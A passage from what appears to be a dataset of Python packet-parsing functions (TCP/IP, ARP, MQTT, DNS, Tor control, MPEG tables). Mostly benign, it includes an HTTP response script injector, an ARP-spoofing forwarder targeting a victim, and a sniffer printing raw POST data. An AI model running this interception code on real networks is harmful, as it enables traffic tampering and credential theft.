int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n checksum_value = pkt[start_point:start_point+4]\r\n start_point += 4\r\n urgent_pointer = int(pkt[start_point:start_point+4], 16)\r\n start_point += 4\r\n options = int((2 * packets[i][0][0] - start_point)/2)\r\n\r\n packets[i][2].append(src_port)\r\n packets[i][2].append(dest_port)\r\n packets[i][2].append(sequence_num)\r\n packets[i][2].append(acknowledgment)\r\n packets[i][2].append(data_offset)\r\n packets[i][2].append(flags_str)\r\n packets[i][2].append(window_size)\r\n packets[i][2].append(checksum_value)\r\n packets[i][2].append(urgent_pointer)\r\n packets[i][2].append(options)\r\n return packets", "def parse_mochad_line(self, line):\n # bail out unless it's an incoming RFSEC message\n if line[15:23] == 'Rx RFSEC':\n\n # decode receive RFSEC message. format is either:\n # 09/22 15:39:07 Rx RFSEC Addr: 21:26:80 Func: Contact_alert_min_DS10A\n # ~ or ~\n # 09/22 15:39:07 Rx RFSEC Addr: 0x80 Func: Motion_alert_SP554A\n line_list = line.split(' ')\n addr = line_list[5]\n func = line_list[7]\n\n func_dict = self.decode_func(func)\n\n return addr, {'func': func_dict}, 'security'\n\n# elif line[15:23] == 'Tx RFSEC':\n\n # decode send RFSEC message. format is either:\n # 09/22 15:39:07 Tx RFSEC Addr: 21:26:80 Func: Contact_alert_min_DS10A\n # ~ or ~\n # 09/22 15:39:07 Tx RFSEC Addr: 0x80 Func: Motion_alert_SP554A\n# line_list = line.split(' ')\n# addr = line_list[5]\n# func = line_list[7]\n#\n# func_dict = self.decode_func(func)\n#\n# return addr, {'func': func_dict}, 'trigger'\n\n elif line[15:20] == 'Rx RF':\n\n # decode receive RF message. format is:\n # 02/13 23:54:28 Rx RF HouseUnit: B1 Func: On\n line_list = line.split(' ')\n house_code = line_list[5];\n house_func = line_list[7]\n\n return house_code, {'func': house_func}, 'radio'\n\n elif line[15:20] == 'Rx PL':\n \n # decode receive PL message. format is:\n # 02/13 23:54:28 Rx PL HouseUnit: A1\n # 02/13 23:54:28 Rx PL House: A Func: On\n line_list = line.split(' ')\n if line[21:27] == 'HouseU':\n house_code = line_list[5]\n with open ('/root/.house_code', 'wb') as f:\n pickle.dump(house_code, f)\n else:\n house_func = line_list[7]\n with open ('/root/.house_code', 'rb') as f:\n house_code = pickle.load(f)\n return house_code, {'func': house_func}, 'powerline'\n \n elif line[15:20] == 'Tx PL':\n \n # decode send RF/PL message. 
format is:\n # 02/13 23:54:28 Tx PL HouseUnit: A1\n # 02/13 23:54:28 Tx PL House: A Func: On\n line_list = line.split(' ')\n if line[21:27] == 'HouseU':\n house_code = line_list[5]\n with open ('/root/.house_code', 'wb') as f:\n pickle.dump(house_code, f)\n else:\n house_func = line_list[7]\n with open ('/root/.house_code', 'rb') as f:\n house_code = pickle.load(f)\n return house_code, {'func': house_func}, 'button'\n \n return '', ''", "def process(self):\n fp = open(self.pcap, \"rb\")\n pkts = dpkt.pcap.Reader(fp)\n if self.sip and self.dip and self.sp and self.dp:\n self.process_pkts(pkts)", "def decode_packet(data):\n\n opcodes = [(\"AUTH_LOGON_CHALLENGE\", \"\\x00\"), (\"AUTH_LOGON_PROOF\", \"\\x01\")]\n opcode = data[0] # Opcode of the received packet (First byte)\n if opcode == opcodes[0][1]: # Auth Logon challenge\n srp_rcvd = {\n 'error': data[1], # (you should hope that it is always 0)\n 'B': data[3:35], # Read B and skip 1 field (Length_g)\n 'g': data[36:37], # Read g and skip 1 field (Length_n)\n 'N': data[38:70],\n 's': data[70:102], # Read salt\n 'crc': data[102:] # (useless for private servers)\n }\n return srp_rcvd\n if opcode == opcodes[1][1]:\n # Auth logon proof\n if data[1] == \"\\x00\": # Code error: 0\n srp_rcvd = {'login': 1}\n else:\n srp_rcvd = {'login': 0}\n return srp_rcvd", "def _parse_udp_packet(self, packet_bytes):\n opcode = packet_bytes[:2]\n if opcode == 5:\n reply = self.error_messages[int.from_bytes(packet_bytes[2:4], 'big')]\n print(reply)\n elif opcode == 4:\n reply = \"ACK\"\n else:\n reply = \"UNK\"\n return reply", "def arp_parse(data):\n\t# Iteratize pkt\n\tpkt = packet.Packet(data)\n\ti = iter(pkt)\n\teth_pkt = next(i)\n\t\t# Ensure it's an ethernet frame.\n\tassert isinstance(eth_pkt, ethernet.ethernet)\n\n\tarp_pkt = next(i)\n\tif not isinstance(arp_pkt, arp.arp):\n\t\traise ARPPacket.ARPUnknownFormat()\n\n\tif arp_pkt.opcode not in (ARP_REQUEST, ARP_REPLY):\n\t\traise ARPPacket.ARPUnknownFormat(\n\t\t\tmsg='unsupported opcode %d' % arp_pkt.opcode)\n\n\tif arp_pkt.proto != ETH_TYPE_IP:\n\t\traise ARPPacket.ARPUnknownFormat(\n\t\t\tmsg='unsupported arp ethtype 0x%04x' % arp_pkt.proto)\n\n\treturn arp_pkt", "def __packetHandler(self, hdr, data):\n\t\tif self.quit: raise SystemExit('capture on interface stoped.')\n\n\t\tdecoded_data = self.decoder.decode(data)\n\t\t(src, dst, data) = self.__getHeaderInfo(decoded_data)\n\t\tfor item in regex_links.finditer(str(data)):\n\t\t\tif not item: continue\n\t\t\t#pos = item.start()\n\t\t\tlink = item.groups()[0]\n\t\t\t#self.buffer.append( (link,) )\n\t\t\tself.buffer.append( (link,src,dst,) )\t# append to internal buffer", "def parse(self, data):\n self._readahead.write(data)\n buf = self._readahead.getvalue()\n if len(buf) < 4:\n return\n while len(buf) >= 4:\n size = int(buf[:4], 16)\n if size == 0:\n self.handle_pkt(None)\n buf = buf[4:]\n elif size <= len(buf):\n self.handle_pkt(buf[4:size])\n buf = buf[size:]\n else:\n break\n self._readahead = BytesIO()\n self._readahead.write(buf)", "def handle_icmp(pkt, packets, i, start_point):\r\n icmp_type = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_code = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_checksum = pkt[start_point:start_point+4]\r\n packets[i][2].append(icmp_type)\r\n packets[i][2].append(icmp_code)\r\n packets[i][2].append(icmp_checksum)\r\n return packets", "def parse_payload(self):\n while len(self.buffer) >= 10:\n \"\"\" check magic word \"\"\"\n if self.buffer[0:2] != 
self.mw:\n #LogDebug(\"drop all buffer due to incorrect magic word\")\n self.buffer = b\"\" # drop entire buffer\n\n \"\"\" extract the value from length field \"\"\"\n length = struct.unpack(\"I\", self.buffer[2:6])[0] + 1\n #print \"packet len\", length, \"buffer len\", len(self.buffer)\n if len(self.buffer) < length:\n #LogDebug(\"imcompleted packet will be processed later\")\n break\n\n \"\"\" verify the packet CRC \"\"\"\n calculated_crc = struct.pack(\"I\", binascii.crc32(self.buffer[:length-4]) & 0xFFFFFFFF)\n if calculated_crc != self.buffer[length-4:length]:\n pass\n else:\n payload = self.buffer[6:length-4]\n self.payloads.append(payload)\n self.buffer = self.buffer[length:]", "def handle_packet(cls, packet: scapypacket):\n pass", "def decode(self,buf):\n eth = dpkt.ethernet.Ethernet(buf)\n pkt_len = len(buf)\n if(eth.type== dpkt.ethernet.ETH_TYPE_IP):\n ip = eth.data\n dst_ip = socket.inet_ntoa(ip.dst)\n src_ip = socket.inet_ntoa(ip.src)\n octet_list = string.split(dst_ip,'.')\n broadcast = False\n for o in octet_list:\n if (o == \"255\"):\n broadcast = True\n break\n if((octet_list[0] == \"224\") or (octet_list[0] == \"239\")):\n broadcast = True #Its multicast actually.\n if not broadcast:\n if(ip.p == dpkt.ip.IP_PROTO_TCP):\n pass\n elif(ip.p == dpkt.ip.IP_PROTO_UDP):\n udp =ip.data\n if((udp.dport == 53) or (udp.sport == 53)): # A request. \n if(udp.dport == 53): # A request. \n return self.dns_handler.handle_dns_request(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n if(udp.sport == 53): # A DNS response\n self.dns_handler.handle_dns_response(ip.src,ip.dst,ip.p,udp.sport,udp.dport,udp.data)\n else:\n pass", "def spoof_packet(packet):", "def parse_header(line):\n # 2015-09-27 14:55:41 UTC [192.0.2.1]:56721 -> [192.0.2.2]:443 (37):\n m = re.match(r'(\\d{4}-\\d{2}-\\d{2} \\d{2}:\\d{2}:\\d{2} \\S+) \\[(.+?)\\]:(\\d+) -> \\[(.+?)\\]:(\\d+) \\((\\d+|EOF)\\):?', line)\n if not m:\n raise LogSyntaxError(line)\n res = {}\n res['timestamp'] = m.group(1)\n res['src_addr'] = m.group(2)\n res['src_port'] = int(m.group(3))\n res['dst_addr'] = m.group(4)\n res['dst_port'] = int(m.group(5))\n if m.group(6) == 'EOF':\n res['eof'] = True\n else:\n res['eof'] = False\n res['size'] = int(m.group(6))\n return res", "def decode_network_packet(buf):\n off = 0\n blen = len(buf)\n\n while off < blen:\n ptype, plen = header.unpack_from(buf, off)\n\n if plen > blen - off:\n raise ValueError(\"Packet longer than amount of data in buffer\")\n\n if ptype not in _decoders:\n raise ValueError(\"Message type %i not recognized\" % ptype)\n\n yield ptype, _decoders[ptype](ptype, plen, buf[off:])\n off += plen", "def parse_data(self, byte_stream: BytesIO, header: Header) -> Dict[Any, Any]:\n return self.packet_type_to_parser[header.subpacket_id](byte_stream, header)", "def parse_replaydata(self):\n pass", "def sniff_traffic(hs, count, timeout, traffic_type, pkt_type, exp_dst, step):\n iface = hs.ports['eth1']\n step('Scapy capture started')\n if (traffic_type == \"encap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, timeout={}, \"\n \" filter='port 4789 and (!icmp or !ip6)', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)\n elif (traffic_type == \"decap\"):\n packet = hs.libs.scapy.sniff2(\"iface='{}', count={}, \"\n \" timeout={}, filter='!icmp or !ip6', \"\n \" prn=lambda x:x.show()\".format(\n iface, count, timeout), True)\n parse_packet(packet, traffic_type, pkt_type, exp_dst, step=step)", "def 
process_packet(self, in_port, packet):\n \n buf = bytearray(packet)\n for idx in range((len(packet) + 19)/20):\n logging.debug(hexify(buf[20*idx : 20*(idx+1)], 20))\n\n if self.disabled:\n logging.debug(\"Switch is disabled; discarding packet\")\n return\n\n parsed_packet = ParsedPacket(buf, self.metadata)\n logging.debug(\"Processing packet %d from port %d with %s\" % \n (parsed_packet.id, in_port,\n self.first_processor.name))\n self.first_processor.process(parsed_packet)", "def process_packet(packet):\n if packet.haslayer(HTTPRequest):\n # if this packet is an HTTP Request\n # get the requested URL\n url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()\n # get the requester's IP Address\n ip = packet[IP].src\n # get the request method\n method = packet[HTTPRequest].Method.decode()\n print(\"\\n{GREEN}[+] \", ip, \"Requested \", url, \" with \", method)\n if show_raw and packet.haslayer(Raw) and method == \"POST\":\n # if show_raw flag is enabled, has raw data, and the requested method is \"POST\"\n # then show raw\n print(\"\\n{RED}[*] Some useful Raw data: \", packet[Raw].load)", "def parse_aprs (packet):\n\n print (packet)\n if len(packet) == 0:\n return\n\n chan = ''\n # Split into address and information parts.\n # There could be a leading '[n]' with a channel number.\n m = re.search (r'^(\\[.+\\] *)?([^:]+):(.+)$', packet)\n if m:\n chan = m.group(1)\t# Still enclosed in [].\n addrs = m.group(2)\n info = m.group(3)\n #print ('<>'+addrs+'<>'+info+'<>')\n\n if info[0] == '}':\n # Unwrap third party traffic format\n # Preserve any channel.\n if chan:\n parse_aprs (chan + info[1:])\n else:\n parse_aprs (info[1:])\n elif info[0:3] == '{DE':\n # APRS \"user defined data\" format for EAS.\n #print ('Process \"message\" - ' + info)\n process_eas (chan, info[3:])\n else:\n print ('Not APRS \"user defined data\" format - ' + info)\n else:\n print ('Could not split into address & info parts - ' + packet)", "def test():\n with open('univ1_pt8.pcap', 'rb') as f: #univ1_trace/univ1_pt8\n pcap = Reader(f)\n print_packets(pcap)\n # top_flows()\n host_pairs()", "def packet_decoder(packet_type,string):\n dct = json.loads(string)\n if packet_type == HS_Version:\n return HS_Version(dct['version'])\n if packet_type == HS_Options:\n return HS_Options(minport=dct['minport'], maxport=dct['maxport'],\n portusage=dct['portusage'], protocol=dct['protocol'],\n timeout=dct['timeout'], payload=dct['payload'],\n key=dct['key'])\n if packet_type == Data:\n return Data(data=dct['data'], terminate=int(dct['terminate']))\n if packet_type == Management:\n return Management(dct['command'],location=dct['location'])\n if packet_type == Switching:\n return Switching(dct['status'])\n if packet_type == Error:\n return Error()", "def _processPacket(self, packet):\n packet_type = (packet[0] & 0xF0) >> 4\n packet_flags = (packet[0] & 0x0F)\n\n if packet_type == CONNECT:\n self._handleConnect(packet)\n elif packet_type == CONNACK:\n self._handleConnack(packet)\n elif packet_type == PUBLISH:\n self._handlePublish(packet)\n elif packet_type == PUBACK:\n self._handlePuback(packet)\n elif packet_type == PUBREC:\n self._handlePubrec(packet)\n elif packet_type == PUBREL:\n self._handlePubrel(packet)\n elif packet_type == PUBCOMP:\n self._handlePubcomp(packet)\n elif packet_type == SUBSCRIBE:\n self._handleSubscribe(packet)\n elif packet_type == SUBACK:\n self._handleSuback(packet)\n elif packet_type == UNSUBSCRIBE:\n self._handleUnsubscribe(packet)\n elif packet_type == UNSUBACK:\n 
self._handleUnsuback(packet)\n elif packet_type == PINGREQ:\n self._handlePingreq(packet)\n elif packet_type == PINGRESP:\n self._handlePingresp(packet)\n elif packet_type == DISCONNECT:\n self._handleDisconnect(packet)\n else:\n print(\"ERROR: Invalid Packet Type: %s -- Aborting Connection\" %(packet_type))\n self.transport.abortConnection()", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def __udp_preprocess_packet(self, seq):\n return b'06' + seq.to_bytes(4, 'big') \\\n + self.packets_status[seq][\"size\"].to_bytes(2, 'big') \\\n + self.packets_status[seq][\"payload\"]", "def parse(self) :\n self._curname = None\n self._curattributes = None\n \n self.setVersion((ord(self._data[0]), ord(self._data[1])))\n self.setOperationId(unpack(\">H\", self._data[2:4])[0])\n self.setRequestId(unpack(\">I\", self._data[4:8])[0])\n self.position = 8\n endofattributes = self.tagvalues[\"end-of-attributes-tag\"]\n maxdelimiter = self.tagvalues[\"event_notification-attributes-tag\"]\n nulloffset = lambda : 0\n #try :\n if 1:\n tag = ord(self._data[self.position])\n while tag != endofattributes :\n self.position += 1\n name = self.tags[tag]\n if name is not None :\n func = getattr(self, name.replace(\"-\", \"_\"), nulloffset)\n self.position += func()\n if ord(self._data[self.position]) > maxdelimiter :\n self.position -= 1\n continue\n oldtag = tag\n tag = ord(self._data[self.position])\n if tag == oldtag :\n self._curattributes.append([])\n #except IndexError :\n # raise IPPError, \"Unexpected end of IPP message.\"\n \n self.data = self._data[self.position+1:]\n self.parsed = True", "def _decode_pmt(self, pmt: bytes) -> PMT.PMT:\n pmtdk = PMT.PMT()\n try:\n pointer_field = pmt[0]\n pos = 1 + pointer_field\n pmtdk.table_id = pmt[pos]\n b12, pmtdk.prog_num = struct.unpack('>HH', pmt[pos+1:pos+5])\n section_length = b12 & 4095\n pos_crc = pos + 3 + section_length - 4 # - CRC\n b = pmt[pos + 5]\n pmtdk.ver_num = (b & 62) >> 1\n pmtdk.cur_next_ind = b & 1\n pmtdk.sec_num = pmt[pos + 6]\n pmtdk.last_sec_num = pmt[pos + 7]\n pmtdk.pcr_pid = struct.unpack('>H', pmt[pos+8:pos+10])[0] & 8191\n prog_info_length = struct.unpack('>H', pmt[pos + 10:pos + 12])[0] & 4095\n #pos += 12 + prog_info_length # skip descriptor\n pos += 12\n if prog_info_length > 0:\n pmtdk.descriptors = DescriptorParser.decode_descriptors(pmt[pos:pos+prog_info_length])\n pos += prog_info_length\n while pos < pos_crc:\n stream_type, elementary_pid, es_info_length = struct.unpack('>BHH', pmt[pos:pos+5])\n elementary_pid = elementary_pid & 8191\n es_info_length = es_info_length & 4095\n pmtdk.streams.append({'stream_type': stream_type, 'elementary_pid': elementary_pid})\n pos += 5 + es_info_length # skip descriptor\n try:\n pmtdk.crc32 = (struct.unpack('>L', pmt[pos_crc:pos_crc + 4]))[0]\n crc_check = self.crc32mpeg2(pmt[1+pointer_field:pos_crc])\n if pmtdk.crc32 != crc_check:\n pmtdk.crc32_ok = False\n except Exception as err:\n pmtdk.crc32_ok = False\n logging.warning('PMT CRC check error:' + str(err))\n return pmtdk\n except Exception as err:\n logging.warning('PMT parsing error:' + str(err))\n return None", "def parse_from_dref(self, packet):\n\t\tname = packet[9:].strip(b'\\x00').decode('utf-8')\n\t\traw_value = packet[5:9]\n\t\tvalue = struct.unpack('f', raw_value)[0]\n\t\treturn name, value", "def read_pkt_line(self):\n if self._readahead is None:\n read = 
self.read\n else:\n read = self._readahead.read\n self._readahead = None\n\n try:\n sizestr = read(4)\n if not sizestr:\n raise HangupException()\n size = int(sizestr, 16)\n if size == 0:\n if self.report_activity:\n self.report_activity(4, \"read\")\n return None\n if self.report_activity:\n self.report_activity(size, \"read\")\n pkt_contents = read(size - 4)\n except socket.error as e:\n raise GitProtocolError(e)\n else:\n if len(pkt_contents) + 4 != size:\n raise GitProtocolError(\n \"Length of pkt read %04x does not match length prefix %04x\"\n % (len(pkt_contents) + 4, size)\n )\n return pkt_contents", "def extract_int_data(ether_pkt):\n if ether_pkt.type == IPV4_TYPE:\n ip_pkt = IP(_pkt=ether_pkt.payload)\n logger.debug('IPv4 dst - [%s], src - [%s], proto - [%s]',\n ip_pkt.dst, ip_pkt.src, ip_pkt.proto)\n elif ether_pkt.type == IPV6_TYPE:\n ip_pkt = IPv6(_pkt=ether_pkt.payload)\n logger.debug('IPv6 dst - [%s], src - [%s], nh - [%s]',\n ip_pkt.dst, ip_pkt.src, ip_pkt.nh)\n else:\n logger.warn('Unable to process ether type - [%s]', ether_pkt.type)\n return None\n\n udp_int_pkt = UDP(_pkt=ip_pkt.payload)\n logger.debug('UDP INT sport - [%s], dport - [%s], len - [%s]',\n udp_int_pkt.sport, udp_int_pkt.dport, udp_int_pkt.len)\n int_shim_pkt = IntShim(_pkt=udp_int_pkt.payload)\n logger.debug('INT Shim next_proto - [%s], npt - [%s], length - [%s]',\n int_shim_pkt.next_proto, int_shim_pkt.npt,\n int_shim_pkt.length)\n int_hdr_pkt = IntHeader(_pkt=int_shim_pkt.payload)\n logger.debug('INT Header ver - [%s]', int_hdr_pkt.ver)\n int_meta_1 = IntMeta1(_pkt=int_hdr_pkt.payload)\n logger.debug('INT Meta 1 switch_id - [%s]', int_meta_1.switch_id)\n int_meta_2 = IntMeta2(_pkt=int_meta_1.payload)\n logger.debug('INT Meta 2 switch_id - [%s]', int_meta_2.switch_id)\n source_int_pkt = SourceIntMeta(_pkt=int_meta_2.payload)\n logger.debug('SourceIntMeta switch_id - [%s], orig_mac - [%s]',\n source_int_pkt.switch_id, source_int_pkt.orig_mac)\n\n if int_shim_pkt.next_proto == UDP_PROTO:\n tcp_udp_pkt = UDP(_pkt=source_int_pkt.payload)\n logger.debug('TCP sport - [%s], dport - [%s], len - [%s]',\n tcp_udp_pkt.sport, tcp_udp_pkt.dport, tcp_udp_pkt.len)\n else:\n tcp_udp_pkt = TCP(_pkt=source_int_pkt.payload)\n logger.debug('TCP sport - [%s], dport - [%s]',\n tcp_udp_pkt.sport, tcp_udp_pkt.dport)\n\n orig_mac = source_int_pkt.orig_mac\n\n try:\n out = dict(\n devMac=orig_mac,\n devAddr=ip_pkt.src,\n dstAddr=ip_pkt.dst,\n dstPort=tcp_udp_pkt.dport,\n protocol=int_shim_pkt.next_proto,\n packetLen=len(ether_pkt),\n )\n except Exception as e:\n logger.error('Error extracting header data - %s', e)\n return None\n logger.debug('Extracted header data [%s]', out)\n return out", "def preprocess_capture(data, ip_version=4, transp_layer=\"TCP\"):\n #SEE: https://www.winpcap.org/ntar/draft/PCAP-DumpFileFormat.html\n\n #TODO Implement ipv6, udp and ICMP\n if ip_version == 4:\n pass\n else:\n raise ValueError('IP version must be \"4\"')\n\n if transp_layer == \"TCP\":\n pass\n else:\n raise ValueError('transport layer must be TCP')\n\n try:\n capt = pyshark.FileCapture(data, keep_packets=False, display_filter='tcp')\n except:\n exit(\"Could not open pcap file\")\n\n ip_fields = ['src', 'dst', 'flags_df', 'flags_mf', 'hdr_len', 'len', 'ttl']\n tcp_fields = ['srcport', 'dstport', 'flags_ack', 'flags_fin', 'flags_push',\n 'flags_reset', 'flags_syn', 'flags_urg', 'hdr_len', 'len']\n\n #Temporary list to feed the final DataFrame (Performance)\n tmp = []\n counter = 0\n logging.info(\"Starting packet processing\")\n for pkt in 
capt:\n filtered = {}\n #First field is a empty string (ignoring)\n if hasattr(pkt, 'ip'):\n for field in ip_fields:\n #Changing field names for disambiguation in columns\n filtered[\"ip_\"+field] = pkt[\"ip\"].get_field(field)\n else:\n continue\n if hasattr(pkt, 'tcp'):\n for field in tcp_fields:\n #Changing field names for disambiguation in columns\n filtered[\"tcp_\"+field] = pkt[\"tcp\"].get_field(field)\n else:\n continue\n tmp.append(filtered)\n counter += 1\n if counter % 1000 == 0:\n logging.info(\"Processed %d packets\", counter)\n logging.info(\"Ended packet processing\")\n logging.info(\"Converting list to DataFrame\")\n X = pd.DataFrame(tmp)\n logging.info(\"Ended list conversion\")\n return X", "def handle_ip_header(pkt, packets, index):\r\n ver = pkt[28]\r\n ihl = pkt[29]\r\n type_of_service = pkt[30:32]\r\n total_length = int(pkt[32:36], 16)\r\n identification = int(pkt[36:40], 16)\r\n flags = pkt[40:44]\r\n ttl = int(pkt[44:46], 16)\r\n protocol = int(pkt[46:48], 16)\r\n header_checksum = pkt[48:52]\r\n src_ip = pkt[52:60]\r\n dest_ip = pkt[60:68]\r\n str_src = str(int(src_ip[0:2], 16))\r\n for i in range(2, len(src_ip), 2):\r\n str_src += \".\" + str(int(src_ip[i:i+2], 16))\r\n str_dest = str(int(dest_ip[0:2], 16))\r\n for i in range(2, len(dest_ip), 2):\r\n str_dest += \".\" + str(int(dest_ip[i:i+2], 16))\r\n next_start_point = 2 * (ethe_header_len + int(ihl) * 4)\r\n options = pkt[68:2*(ethe_header_len + int(ihl)*4)]\r\n\r\n # store it to specific location for each packet\r\n packets[index][1].append(ver)\r\n packets[index][1].append(ihl)\r\n packets[index][1].append(type_of_service)\r\n packets[index][1].append(total_length)\r\n packets[index][1].append(identification)\r\n packets[index][1].append(flags)\r\n packets[index][1].append(ttl)\r\n packets[index][1].append(protocol)\r\n packets[index][1].append(header_checksum)\r\n packets[index][1].append(str_src)\r\n packets[index][1].append(str_dest)\r\n packets[index][1].append(options)\r\n\r\n return packets, next_start_point", "def process_packet(packet):\n scapy_packet = scapy.IP(packet.get_payload())\n print(\"[+] Processing Packet...\")\n if scapy_packet.haslayer(scapy.Raw):\n load = scapy_packet[scapy.Raw].load\n if scapy_packet[scapy.TCP].dport == 80:\n print(\"[+] Request !!!!!\")\n if \"Accept-Encoding:\" in load:\n load = re.sub(\"Accept-Encoding:.*?\\\\r\\\\n\",\"\",load)\n elif scapy_packet[scapy.TCP].sport == 80:\n print(\"[+] Response !!!!!\")\n injection_code = \"<script>alert('Shubhi');</script>\"\n load = scapy_packet[scapy.Raw].load.replace(\"</body>\",injection_code+\"</body>\")\n content_length_search = re.search(\"(?:Content-Length:\\s)(\\d*)\",load)\n if content_length_search:\n content_length = content_length_search.group(1)\n new_content_length = int(content_length)+len(injection_code)\n load = load.replace(content_length,str(new_content_length))\n if load!=scapy_packet[scapy.Raw].load:\n scapy_packet = set_load(scapy_packet, load)\n packet.set_payload(str(scapy_packet))\n scapy_packet.show()\n packet.accept()", "def _decode1(self, body, data):\r\n if \" \" in body:\r\n evtype,body = body.split(\" \",1)\r\n else:\r\n evtype,body = body,\"\"\r\n evtype = evtype.upper()\r\n if evtype == \"CIRC\":\r\n m = re.match(r\"(\\d+)\\s+(\\S+)(\\s\\S+)?(\\s\\S+)?(\\s\\S+)?(\\s\\S+)?\", body)\r\n if not m:\r\n raise ProtocolError(\"CIRC event misformatted.\")\r\n ident,status,path,purpose,reason,remote = m.groups()\r\n ident = int(ident)\r\n if path:\r\n if \"PURPOSE=\" in path:\r\n remote = reason\r\n reason = 
purpose\r\n purpose=path\r\n path=[]\r\n elif \"REASON=\" in path:\r\n remote = reason\r\n reason = path\r\n purpose = \"\"\r\n path=[]\r\n else:\r\n path_verb = path.strip().split(\",\")\r\n path = []\r\n for p in path_verb:\r\n path.append(p.replace(\"~\", \"=\").split(\"=\")[0])\r\n else:\r\n path = []\r\n\r\n if purpose and \"REASON=\" in purpose:\r\n remote=reason\r\n reason=purpose\r\n purpose=\"\"\r\n\r\n if purpose: purpose = purpose[9:]\r\n if reason: reason = reason[8:]\r\n if remote: remote = remote[15:]\r\n event = CircuitEvent(evtype, ident, status, path, purpose, reason,\r\n remote, body)\r\n elif evtype == \"STREAM\":\r\n #plog(\"DEBUG\", \"STREAM: \"+body)\r\n m = re.match(r\"(\\S+)\\s+(\\S+)\\s+(\\S+)\\s+(\\S+)?:(\\d+)(\\sREASON=\\S+)?(\\sREMOTE_REASON=\\S+)?(\\sSOURCE=\\S+)?(\\sSOURCE_ADDR=\\S+)?(\\s+PURPOSE=\\S+)?\", body)\r\n if not m:\r\n raise ProtocolError(\"STREAM event misformatted.\")\r\n ident,status,circ,target_host,target_port,reason,remote,source,source_addr,purpose = m.groups()\r\n ident,circ = map(int, (ident,circ))\r\n if not target_host: # This can happen on SOCKS_PROTOCOL failures\r\n target_host = \"(none)\"\r\n if reason: reason = reason[8:]\r\n if remote: remote = remote[15:]\r\n if source: source = source[8:]\r\n if source_addr: source_addr = source_addr[13:]\r\n if purpose:\r\n purpose = purpose.lstrip()\r\n purpose = purpose[8:]\r\n event = StreamEvent(evtype, ident, status, circ, target_host,\r\n int(target_port), reason, remote, source, source_addr,\r\n purpose, body)\r\n elif evtype == \"ORCONN\":\r\n m = re.match(r\"(\\S+)\\s+(\\S+)(\\sAGE=\\S+)?(\\sREAD=\\S+)?(\\sWRITTEN=\\S+)?(\\sREASON=\\S+)?(\\sNCIRCS=\\S+)?\", body)\r\n if not m:\r\n raise ProtocolError(\"ORCONN event misformatted.\")\r\n target, status, age, read, wrote, reason, ncircs = m.groups()\r\n\r\n #plog(\"DEBUG\", \"ORCONN: \"+body)\r\n if ncircs: ncircs = int(ncircs[8:])\r\n else: ncircs = 0\r\n if reason: reason = reason[8:]\r\n if age: age = int(age[5:])\r\n else: age = 0\r\n if read: read = int(read[6:])\r\n else: read = 0\r\n if wrote: wrote = int(wrote[9:])\r\n else: wrote = 0\r\n event = ORConnEvent(evtype, status, target, age, read, wrote,\r\n reason, ncircs, body)\r\n elif evtype == \"STREAM_BW\":\r\n m = re.match(r\"(\\d+)\\s+(\\d+)\\s+(\\d+)\", body)\r\n if not m:\r\n raise ProtocolError(\"STREAM_BW event misformatted.\")\r\n event = StreamBwEvent(evtype, body, *m.groups())\r\n elif evtype == \"BW\":\r\n m = re.match(r\"(\\d+)\\s+(\\d+)\", body)\r\n if not m:\r\n raise ProtocolError(\"BANDWIDTH event misformatted.\")\r\n read, written = map(long, m.groups())\r\n event = BWEvent(evtype, read, written, body)\r\n elif evtype in (\"DEBUG\", \"INFO\", \"NOTICE\", \"WARN\", \"ERR\"):\r\n event = LogEvent(evtype, body)\r\n elif evtype == \"NEWDESC\":\r\n ids_verb = body.split(\" \")\r\n ids = []\r\n for i in ids_verb:\r\n ids.append(i.replace(\"~\", \"=\").split(\"=\")[0].replace(\"$\",\"\"))\r\n event = NewDescEvent(evtype, ids, body)\r\n elif evtype == \"ADDRMAP\":\r\n # TODO: Also parse errors and GMTExpiry\r\n m = re.match(r'(\\S+)\\s+(\\S+)\\s+(\\\"[^\"]+\\\"|\\w+)', body)\r\n if not m:\r\n raise ProtocolError(\"ADDRMAP event misformatted.\")\r\n fromaddr, toaddr, when = m.groups()\r\n if when.upper() == \"NEVER\": \r\n when = None\r\n else:\r\n when = time.strptime(when[1:-1], \"%Y-%m-%d %H:%M:%S\")\r\n event = AddrMapEvent(evtype, fromaddr, toaddr, when, body)\r\n elif evtype == \"NS\":\r\n event = NetworkStatusEvent(evtype, parse_ns_body(data), data)\r\n elif evtype == 
\"NEWCONSENSUS\":\r\n event = NewConsensusEvent(evtype, parse_ns_body(data), data)\r\n elif evtype == \"BUILDTIMEOUT_SET\":\r\n m = re.match(\r\n r\"(\\S+)\\sTOTAL_TIMES=(\\d+)\\sTIMEOUT_MS=(\\d+)\\sXM=(\\d+)\\sALPHA=(\\S+)\\sCUTOFF_QUANTILE=(\\S+)\",\r\n body)\r\n set_type, total_times, timeout_ms, xm, alpha, quantile = m.groups()\r\n event = BuildTimeoutSetEvent(evtype, set_type, int(total_times),\r\n int(timeout_ms), int(xm), float(alpha),\r\n float(quantile), body)\r\n elif evtype == \"GUARD\":\r\n m = re.match(r\"(\\S+)\\s(\\S+)\\s(\\S+)\", body)\r\n entry, guard, status = m.groups()\r\n event = GuardEvent(evtype, entry, guard, status, body)\r\n elif evtype == \"TORCTL_TIMER\":\r\n event = TimerEvent(evtype, data)\r\n else:\r\n event = UnknownEvent(evtype, body)\r\n\r\n return event", "def parse_data(self, data):\n\t\tname, value = self.parse_from_dref(data)\n\t\tpacket = TrollPacket.from_name(name, value)\n\t\tself.update_listeners(packet)", "def udp_pkt_cap(port=None, cnt=125):\n if not port:\n udp_port = 2368\n else:\n udp_port = port\n\n # type: udp socket\n udpSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\n # Enable the SO_REUSEADDR option\n udpSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n new_state = 